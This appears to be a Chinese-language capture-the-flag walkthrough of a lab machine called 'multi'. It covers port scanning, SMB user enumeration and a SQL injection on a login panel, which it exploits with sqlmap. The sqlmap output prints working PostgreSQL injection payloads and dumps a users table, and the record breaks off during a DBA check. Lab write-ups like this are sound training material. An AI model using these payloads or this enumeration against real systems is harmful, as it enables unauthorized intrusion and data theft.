image-20251209193711649

先定位靶机

image-20251209194851558

看一下端口服务

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# cat ports.txt 
# Nmap 7.94SVN scan initiated Tue Dec  9 06:46:22 2025 as: /usr/lib/nmap/nmap -p- --min-rate 10000 -oN ports.txt 192.168.56.111
Nmap scan report for 192.168.56.111
Host is up (0.00040s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2049/tcp  open  nfs
3306/tcp  open  mysql
28080/tcp open  thor-engine
33273/tcp open  unknown
34863/tcp open  unknown
56189/tcp open  unknown
60977/tcp open  unknown
MAC Address: 08:00:27:7C:83:9F (Oracle VirtualBox virtual NIC)

# Nmap done at Tue Dec  9 06:46:24 2025 -- 1 IP address (1 host up) scanned in 2.75 seconds

看一下具体服务

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# nmap -sCV -p- --min-rate 10000 192.168.56.111
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-09 06:48 EST
Nmap scan report for 192.168.56.111
Host is up (0.00045s latency).
Not shown: 65521 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          vsftpd 3.0.3
| ssl-cert: Subject: commonName=ftp-server/organizationName=MyOrganization/stateOrProvinceName=Beijing/countryName=CN
| Not valid before: 2025-07-17T11:34:00
|_Not valid after:  2035-07-15T11:34:00
|_ssl-date: TLS randomness does not represent time
22/tcp    open  ssh          OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
23/tcp    open  telnet       Linux telnetd
80/tcp    open  http         Apache httpd 2.4.62 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.62 (Debian)
111/tcp   open  rpcbind      2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      37409/udp6  mountd
|   100005  1,2,3      40623/tcp6  mountd
|   100005  1,2,3      53305/udp   mountd
|   100005  1,2,3      56189/tcp   mountd
|   100021  1,3,4      33273/tcp   nlockmgr
|   100021  1,3,4      37048/udp6  nlockmgr
|   100021  1,3,4      37211/tcp6  nlockmgr
|   100021  1,3,4      51459/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open  netbios-ssn  Samba smbd 4.6.2
445/tcp   open  netbios-ssn  Samba smbd 4.6.2
2049/tcp  open  nfs          3-4 (RPC #100003)
3306/tcp  open  mysql        MariaDB (unauthorized)
28080/tcp open  thor-engine?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.1.3 Python/3.9.2
|     Date: Tue, 09 Dec 2025 11:48:28 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 586
|     Connection: close
|     <!doctype html>
|     <html>
|     <head>
|     <title>Admin Panel</title>
|     <style>
|     body { font-family: Arial, sans-serif; margin: 20px; }
|     table { border-collapse: collapse; width: 100%; }
|     border: 1px solid #ddd; padding: 8px; text-align: left; }
|     background-color: #f2f2f2; }
|     .error { color: red; }
|     </style>
|     </head>
|     <body>
|     <h2>Welcome</h2>
|     <form method="POST" action="/">
|     Username: <input name="username" required>
|     <input type="submit" value="Login">
|     </form>
|     </body>
|     </html>
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.1.3 Python/3.9.2
|     Date: Tue, 09 Dec 2025 11:48:28 GMT
|     Content-Type: text/html; charset=utf-8
|     Allow: OPTIONS, POST, HEAD, GET
|     Content-Length: 0
|     Connection: close
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
33273/tcp open  nlockmgr     1-4 (RPC #100021)
34863/tcp open  mountd       1-3 (RPC #100005)
56189/tcp open  mountd       1-3 (RPC #100005)
60977/tcp open  mountd       1-3 (RPC #100005)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port28080-TCP:V=7.94SVN%I=7%D=12/9%Time=69380C8E%P=x86_64-pc-linux-gnu%
SF:r(GetRequest,2F7,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.1\.3
SF:\x20Python/3\.9\.2\r\nDate:\x20Tue,\x2009\x20Dec\x202025\x2011:48:28\x2
SF:0GMT\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:
SF:\x20586\r\nConnection:\x20close\r\n\r\n\n<!doctype\x20html>\n<html>\n<h
SF:ead>\n\x20\x20\x20\x20<title>Admin\x20Panel</title>\n\x20\x20\x20\x20<s
SF:tyle>\n\x20\x20\x20\x20\x20\x20\x20\x20body\x20{\x20font-family:\x20Ari
SF:al,\x20sans-serif;\x20margin:\x2020px;\x20}\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20table\x20{\x20border-collapse:\x20collapse;\x20width:\x20100%;\x2
SF:0}\n\x20\x20\x20\x20\x20\x20\x20\x20th,\x20td\x20{\x20border:\x201px\x2
SF:0solid\x20#ddd;\x20padding:\x208px;\x20text-align:\x20left;\x20}\n\x20\
SF:x20\x20\x20\x20\x20\x20\x20th\x20{\x20background-color:\x20#f2f2f2;\x20
SF:}\n\x20\x20\x20\x20\x20\x20\x20\x20\.error\x20{\x20color:\x20red;\x20}\
SF:n\x20\x20\x20\x20</style>\n</head>\n<body>\n\x20\x20\x20\x20<h2>Welcome
SF:</h2>\n\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20<form\x20metho
SF:d=\"POST\"\x20action=\"/\">\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20Username:\x20<input\x20name=\"username\"\x20required>\n\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20<input\x20type=\"submit\"\x20valu
SF:e=\"Login\">\n\x20\x20\x20\x20\x20\x20\x20\x20</form>\n\x20\x20\x20\x20
SF:\n\x20\x20\x20\x20\n\x20\x20\x20\x20\n</body>\n</html>")%r(HTTPOptions,
SF:CC,"HTTP/1\.1\x20200\x20OK\r\nServer:\x20Werkzeug/3\.1\.3\x20Python/3\.
SF:9\.2\r\nDate:\x20Tue,\x2009\x20Dec\x202025\x2011:48:28\x20GMT\r\nConten
SF:t-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20OPTIONS,\x20POST,\x
SF:20HEAD,\x20GET\r\nContent-Length:\x200\r\nConnection:\x20close\r\n\r\n"
SF:)%r(RTSPRequest,1F4,"<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HT
SF:ML\x204\.01//EN\"\n\x20\x20\x20\x20\x20\x20\x20\x20\"http://www\.w3\.or
SF:g/TR/html4/strict\.dtd\">\n<html>\n\x20\x20\x20\x20<head>\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20<meta\x20http-equiv=\"Content-Type\"\x20content=\"t
SF:ext/html;charset=utf-8\">\n\x20\x20\x20\x20\x20\x20\x20\x20<title>Error
SF:\x20response</title>\n\x20\x20\x20\x20</head>\n\x20\x20\x20\x20<body>\n
SF:\x20\x20\x20\x20\x20\x20\x20\x20<h1>Error\x20response</h1>\n\x20\x20\x2
SF:0\x20\x20\x20\x20\x20<p>Error\x20code:\x20400</p>\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20<p>Message:\x20Bad\x20request\x20version\x20\('RTSP/1\.0'\)
SF:\.</p>\n\x20\x20\x20\x20\x20\x20\x20\x20<p>Error\x20code\x20explanation
SF::\x20HTTPStatus\.BAD_REQUEST\x20-\x20Bad\x20request\x20syntax\x20or\x20
SF:unsupported\x20method\.</p>\n\x20\x20\x20\x20</body>\n</html>\n");
MAC Address: 08:00:27:7C:83:9F (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-time: 
|   date: 2025-12-09T11:49:48
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: MULTI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: -3s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.69 seconds

ftp的版本挺高的看一下匿名登陆就行

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# ftp 192.168.56.111
Connected to 192.168.56.111.
220 (vsFTPd 3.0.3)
Name (192.168.56.111:root): anonymous
530 Permission denied.
ftp: Login failed
ftp>

80web端口

image-20251209201732643

image-20251209201811163

端口 445 (SMB)

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# enum4linux -a 192.168.56.111
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Dec  9 07:35:23 2025

 =========================================( Target Information )=========================================
                                                                                                                                                                                                                  
Target ........... 192.168.56.111                                                                                                                                                                                 
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.111 )===========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Got domain/workgroup name: SECUREGROUP                                                                                                                                                                        
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ===============================( Nbtstat Information for 192.168.56.111 )===============================
                                                                                                                                                                                                                  
Looking up status of 192.168.56.111                                                                                                                                                                               
        MULTI           <00> -         B <ACTIVE>  Workstation Service
        MULTI           <03> -         B <ACTIVE>  Messenger Service
        MULTI           <20> -         B <ACTIVE>  File Server Service
        ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
        SECUREGROUP     <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        SECUREGROUP     <1d> -         B <ACTIVE>  Master Browser
        SECUREGROUP     <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ==================================( Session Check on 192.168.56.111 )==================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Server 192.168.56.111 allows sessions using username '', password ''                                                                                                                                          
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ===============================( Getting domain SID for 192.168.56.111 )===============================
                                                                                                                                                                                                                  
Domain Name: SECUREGROUP                                                                                                                                                                                          
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup                                                                                                                                              
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 ==================================( OS information on 192.168.56.111 )==================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Can't get OS info with smbclient                                                                                                                                                                              
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Got OS info for 192.168.56.111 from srvinfo:                                                                                                                                                                  
        MULTI          Wk Sv PrQ Unx NT SNT Secure Samba Server                                                                                                                                                   
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03


 ======================================( Users on 192.168.56.111 )======================================
                                                                                                                                                                                                                  
Use of uninitialized value $users in print at ./enum4linux.pl line 972.                                                                                                                                           
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975.

Use of uninitialized value $users in print at ./enum4linux.pl line 986.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988.

 ================================( Share Enumeration on 192.168.56.111 )================================
                                                                                                                                                                                                                  
smbXcli_negprot_smb1_done: No compatible protocol selected by server.                                                                                                                                             

        Sharename       Type      Comment
        ---------       ----      -------
        secure_share    Disk      
        IPC$            IPC       IPC Service (Secure Samba Server)
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.56.111 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.56.111                                                                                                                                                                    
                                                                                                                                                                                                                  
//192.168.56.111/secure_share   Mapping: OK Listing: OK Writing: N/A                                                                                                                                              

[E] Can't understand response:                                                                                                                                                                                    
                                                                                                                                                                                                                  
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*                                                                                                                                                                        
//192.168.56.111/IPC$   Mapping: N/A Listing: N/A Writing: N/A

 ===========================( Password Policy Information for 192.168.56.111 )===========================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[E] Unexpected error from polenum:                                                                                                                                                                                
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  

[+] Attaching to 192.168.56.111 using a NULL share

[+] Trying protocol 139/SMB...

        [!] Protocol failed: ('unpack requires a buffer of 1 bytes', "When unpacking field 'SecurityMode | <B | b''[:1]'")

[+] Trying protocol 445/SMB...

        [!] Protocol failed: SMB SessionError: STATUS_NOT_SUPPORTED(The request is not supported.)



[+] Retieved partial password policy with rpcclient:                                                                                                                                                              
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
Password Complexity: Disabled                                                                                                                                                                                     
Minimum Password Length: 5


 ======================================( Groups on 192.168.56.111 )======================================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+] Getting builtin groups:                                                                                                                                                                                       
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting builtin group memberships:                                                                                                                                                                           
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting local groups:                                                                                                                                                                                        
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting local group memberships:                                                                                                                                                                             
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting domain groups:                                                                                                                                                                                       
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[+]  Getting domain group memberships:                                                                                                                                                                            
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
 =================( Users on 192.168.56.111 via RID cycling (RIDS: 500-550,1000-1050) )=================
                                                                                                                                                                                                                  
                                                                                                                                                                                                                  
[I] Found new SID:                                                                                                                                                                                                
S-1-22-1                                                                                                                                                                                                          

[I] Found new SID:                                                                                                                                                                                                
S-1-5-32                                                                                                                                                                                                          

[I] Found new SID:                                                                                                                                                                                                
S-1-5-32                                                                                                                                                                                                          

[I] Found new SID:                                                                                                                                                                                                
S-1-5-32                                                                                                                                                                                                          

[I] Found new SID:                                                                                                                                                                                                
S-1-5-32                                                                                                                                                                                                          

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                                                                                       
                                                                                                                                                                                                                  
S-1-22-1-1000 Unix User\todd (Local User)                                                                                                                                                                         
S-1-22-1-1001 Unix User\xiao (Local User)
S-1-22-1-1002 Unix User\secure_user (Local User)
S-1-22-1-1003 Unix User\samba_user (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''                                                                                                                                       
                                                                                                                                                                                                                  
S-1-5-32-544 BUILTIN\Administrators (Local Group)                                                                                                                                                                 
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-5-21-2648146443-3642655822-4195795931 and logon username '', password ''                                                                                                      
                                                                                                                                                                                                                  
S-1-5-21-2648146443-3642655822-4195795931-501 MULTI\nobody (Local User)                                                                                                                                           
S-1-5-21-2648146443-3642655822-4195795931-513 MULTI\None (Domain Group)

 ==============================( Getting printer info for 192.168.56.111 )==============================
                                                                                                                                                                                                                  
No printers returned.                                                                                                                                                                                             


enum4linux complete on Tue Dec  9 07:35:55 2025

两个关键信息

有效的用户名列表

S-1-22-1-1000 Unix User\todd (Local User)
S-1-22-1-1001 Unix User\xiao (Local User)
S-1-22-1-1002 Unix User\secure_user (Local User)
S-1-22-1-1003 Unix User\samba_user (Local User)

和 一个可读的共享文件夹

//192.168.56.111/secure_share Mapping: OK Listing: OK Writing: N/A

image-20251209210007377

应该跟bettercap相关但是还没法利用

继续下一个端口的测试

nfs

image-20251209210355692

这个 NFS 共享被配置为只允许本机 (localhost/127.0.0.1) 挂载

端口 28080 (Python/Werkzeug Web 服务)

image-20251209210750969

随便输什么都能登录,里面有一个用户查询功能

去查到smb发现的几个用户只有xiao会弹出相关信息

image-20251209211018505

有sql注入漏洞

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# sqlmap -r 1 -p keyword -dbs   
        ___
       __H__                                                                                                                                                                                               
 ___ ___[)]_____ ___ ___  {1.8.9#stable}                                                                                                                                                                   
|_ -| . [.]     | .'| . |                                                                                                                                                                                  
|___|_  ["]_|_|_|__,|  _|                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:24:27 /2025-12-09/

[08:24:27] [INFO] parsing HTTP request from '1'
[08:24:27] [INFO] resuming back-end DBMS 'postgresql' 
[08:24:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: keyword=1';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: keyword=1' UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(120)||CHR(107)||CHR(113))||(CHR(112)||CHR(72)||CHR(101)||CHR(86)||CHR(82)||CHR(110)||CHR(90)||CHR(101)||CHR(71)||CHR(113)||CHR(105)||CHR(110)||CHR(114)||CHR(119)||CHR(97)||CHR(68)||CHR(88)||CHR(112)||CHR(111)||CHR(117)||CHR(65)||CHR(80)||CHR(109)||CHR(107)||CHR(83)||CHR(72)||CHR(108)||CHR(117)||CHR(66)||CHR(79)||CHR(121)||CHR(71)||CHR(101)||CHR(110)||CHR(85)||CHR(68)||CHR(88)||CHR(105)||CHR(114)||CHR(88))||(CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)),NULL-- FHqn
---
[08:24:27] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[08:24:27] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[08:24:27] [INFO] fetching database (schema) names
[08:24:28] [WARNING] reflective value(s) found and filtering out
[08:24:28] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[08:24:28] [WARNING] the SQL query provided does not return any output
[08:24:28] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[08:24:28] [INFO] fetching number of databases
[08:24:28] [WARNING] time-based comparison requires larger statistical model, please wait.......................... (done)                                                                                
[08:24:28] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions 
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] 

[08:24:58] [INFO] adjusting time delay to 1 second due to good response times
3
[08:24:58] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)                                                                   

[08:24:59] [INFO] retrieved: 
[08:24:59] [INFO] retrieved: 
[08:24:59] [INFO] falling back to current database
[08:24:59] [INFO] fetching current database
[08:24:59] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
available databases [1]:
[*] public

[08:24:59] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[08:24:59] [WARNING] your sqlmap version is outdated

[*] ending @ 08:24:59 /2025-12-09/


public库

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# sqlmap -r 1 -p keyword -D public --tables
        ___
       __H__                                                                                                                                                                                               
 ___ ___[)]_____ ___ ___  {1.8.9#stable}                                                                                                                                                                   
|_ -| . [']     | .'| . |                                                                                                                                                                                  
|___|_  [,]_|_|_|__,|  _|                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:27:41 /2025-12-09/

[08:27:41] [INFO] parsing HTTP request from '1'
[08:27:41] [INFO] resuming back-end DBMS 'postgresql' 
[08:27:41] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: keyword=1';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: keyword=1' UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(120)||CHR(107)||CHR(113))||(CHR(112)||CHR(72)||CHR(101)||CHR(86)||CHR(82)||CHR(110)||CHR(90)||CHR(101)||CHR(71)||CHR(113)||CHR(105)||CHR(110)||CHR(114)||CHR(119)||CHR(97)||CHR(68)||CHR(88)||CHR(112)||CHR(111)||CHR(117)||CHR(65)||CHR(80)||CHR(109)||CHR(107)||CHR(83)||CHR(72)||CHR(108)||CHR(117)||CHR(66)||CHR(79)||CHR(121)||CHR(71)||CHR(101)||CHR(110)||CHR(85)||CHR(68)||CHR(88)||CHR(105)||CHR(114)||CHR(88))||(CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)),NULL-- FHqn
---
[08:27:41] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[08:27:41] [INFO] fetching tables for database: 'public'
[08:27:41] [WARNING] reflective value(s) found and filtering out
Database: public
[1 table]
+-------+
| users |
+-------+

[08:27:41] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[08:27:41] [WARNING] your sqlmap version is outdated

[*] ending @ 08:27:41 /2025-12-09/


users表

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# sqlmap -r 1 -p keyword -D public -T users --columns  
        ___
       __H__                                                                                                                                                                                               
 ___ ___[.]_____ ___ ___  {1.8.9#stable}                                                                                                                                                                   
|_ -| . ["]     | .'| . |                                                                                                                                                                                  
|___|_  [)]_|_|_|__,|  _|                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:28:34 /2025-12-09/

[08:28:34] [INFO] parsing HTTP request from '1'
[08:28:34] [INFO] resuming back-end DBMS 'postgresql' 
[08:28:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: keyword=1';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: keyword=1' UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(120)||CHR(107)||CHR(113))||(CHR(112)||CHR(72)||CHR(101)||CHR(86)||CHR(82)||CHR(110)||CHR(90)||CHR(101)||CHR(71)||CHR(113)||CHR(105)||CHR(110)||CHR(114)||CHR(119)||CHR(97)||CHR(68)||CHR(88)||CHR(112)||CHR(111)||CHR(117)||CHR(65)||CHR(80)||CHR(109)||CHR(107)||CHR(83)||CHR(72)||CHR(108)||CHR(117)||CHR(66)||CHR(79)||CHR(121)||CHR(71)||CHR(101)||CHR(110)||CHR(85)||CHR(68)||CHR(88)||CHR(105)||CHR(114)||CHR(88))||(CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)),NULL-- FHqn
---
[08:28:34] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[08:28:34] [INFO] fetching columns for table 'users' in database 'public'
[08:28:34] [WARNING] reflective value(s) found and filtering out
Database: public
Table: users
[3 columns]
+----------+------+
| Column   | Type |
+----------+------+
| email    | text |
| id       | int4 |
| username | text |
+----------+------+

[08:28:34] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[08:28:34] [WARNING] your sqlmap version is outdated

[*] ending @ 08:28:34 /2025-12-09/


三个字段text,int4,text

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# sqlmap -r 1 -p keyword -D public -T users --dump

        ___
       __H__                                                                                                                                                                                               
 ___ ___[']_____ ___ ___  {1.8.9#stable}                                                                                                                                                                   
|_ -| . ["]     | .'| . |                                                                                                                                                                                  
|___|_  [.]_|_|_|__,|  _|                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:41:40 /2025-12-09/

[08:41:40] [INFO] parsing HTTP request from '1'
[08:41:40] [INFO] resuming back-end DBMS 'postgresql' 
[08:41:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: keyword=1';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: keyword=1' UNION ALL SELECT NULL,(CHR(113)||CHR(118)||CHR(120)||CHR(107)||CHR(113))||(CHR(112)||CHR(72)||CHR(101)||CHR(86)||CHR(82)||CHR(110)||CHR(90)||CHR(101)||CHR(71)||CHR(113)||CHR(105)||CHR(110)||CHR(114)||CHR(119)||CHR(97)||CHR(68)||CHR(88)||CHR(112)||CHR(111)||CHR(117)||CHR(65)||CHR(80)||CHR(109)||CHR(107)||CHR(83)||CHR(72)||CHR(108)||CHR(117)||CHR(66)||CHR(79)||CHR(121)||CHR(71)||CHR(101)||CHR(110)||CHR(85)||CHR(68)||CHR(88)||CHR(105)||CHR(114)||CHR(88))||(CHR(113)||CHR(118)||CHR(98)||CHR(122)||CHR(113)),NULL-- FHqn
---
[08:41:40] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[08:41:40] [INFO] fetching columns for table 'users' in database 'public'
[08:41:40] [INFO] fetching entries for table 'users' in database 'public'
[08:41:40] [WARNING] reflective value(s) found and filtering out
Database: public
Table: users
[4 entries]
+----+-----------------+----------+
| id | email           | username |
+----+-----------------+----------+
| 1  | admin@multi.hmv | admin    |
| 2  | guest@multi.hmv | guest    |
| 3  | test@multi.hmv  | test     |
| 4  | xiao@multi.hmv  | xiao     |
+----+-----------------+----------+

[08:41:40] [INFO] table 'public.users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.56.111/dump/public/users.csv'
[08:41:40] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.56.111'
[08:41:40] [WARNING] your sqlmap version is outdated

[*] ending @ 08:41:40 /2025-12-09/

现在知道为什么只能查到xiao了其实就是巧了

┌──(root㉿kali)-[/myift/bachang/hvm/mutli]
└─# sqlmap -r 1 -p keyword --is-dba
        ___
       __H__                                                                                                                                                                                               
 ___ ___[.]_____ ___ ___  {1.8.9#stable}                                                                                                                                                                   
|_ -| . [)]     | .'| . |                                                                                                                                                                                  
|___|_  [']_|_|_|__,|  _|                                                                                                                                                                                  
      |_|V...       |_|   https://sqlmap.org                                                                                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:46:36 /2025-12-09/

[08:46:36] [INFO] parsing HTTP request from '1'
[08:46:36] [INFO] resuming back-end DBMS 'postgresql' 
[08:46:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: keyword (POST)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: keyword=1';SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
